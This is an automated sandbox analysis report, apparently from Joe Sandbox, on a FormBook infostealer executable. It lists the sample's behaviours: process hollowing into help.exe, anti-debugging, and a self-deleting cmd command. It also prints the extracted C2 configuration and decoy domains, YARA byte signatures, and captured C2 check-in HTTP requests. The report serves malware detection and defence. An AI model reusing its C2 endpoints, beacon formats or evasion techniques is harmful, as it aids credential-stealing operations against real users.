
Analysis Report 5t2CmTUhKc.exe

Overview

General Information

Sample Name: 5t2CmTUhKc.exe
Analysis ID: 433074
MD5: 116e736ba00fca4b8499c4df00796454
SHA1: a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
SHA256: 096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 5t2CmTUhKc.exe (PID: 6368 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
    • 5t2CmTUhKc.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 5696 cmdline: /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries in total; remaining entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x158c9:$sqlite3step: 68 34 1C 7B E1
  • 0x159dc:$sqlite3step: 68 34 1C 7B E1
  • 0x158f8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
  • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries in total; remaining entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd | Avira URL Cloud: Label: malware
Source: http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd | Avira URL Cloud: Label: phishing
Source: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz | Avira URL Cloud: Label: phishing
Found malware configuration
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 5t2CmTUhKc.exe | Virustotal: Detection: 28%
Source: 5t2CmTUhKc.exe | ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 5t2CmTUhKc.exe | Joe Sandbox ML: detected
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.help.exe.4ed3f8.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.help.exe.35c7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5t2CmTUhKc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.oceancollaborative.com/bp3i/
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.thechandeck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1 Host: www.bancambios.network Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.purpleqube.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1 Host: www.middreampostal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.xn---yado-8e4dze0c.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1 Host: www.oceancollaborative.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View | ASN Name: CYBERCONUS CYBERCONUS
Source: Joe Sandbox View | ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
Source: Joe Sandbox View | ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.thechandeck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1 Host: www.bancambios.network Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.purpleqube.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1 Host: www.middreampostal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1 Host: www.xn---yado-8e4dze0c.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1 Host: www.oceancollaborative.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.bluebeltpanobuy.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Last-Modified: Tue, 25 Jun 2019 07:07:25 GMT Etag: "999-5d11c82d-331806d17fbda5d0;;;" Accept-Ranges: bytes Content-Length: 2457 Date: Fri, 11 Jun 2021 06:55:14 GMT Server: LiteSpeed Data Raw: (hex dump of the HTML response body omitted)
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: http://dfltweb1.onamae.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 5t2CmTUhKc.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 5t2CmTUhKc.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&ut
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | String found in binary or memory: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Both rules matched in each of the following sources:
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
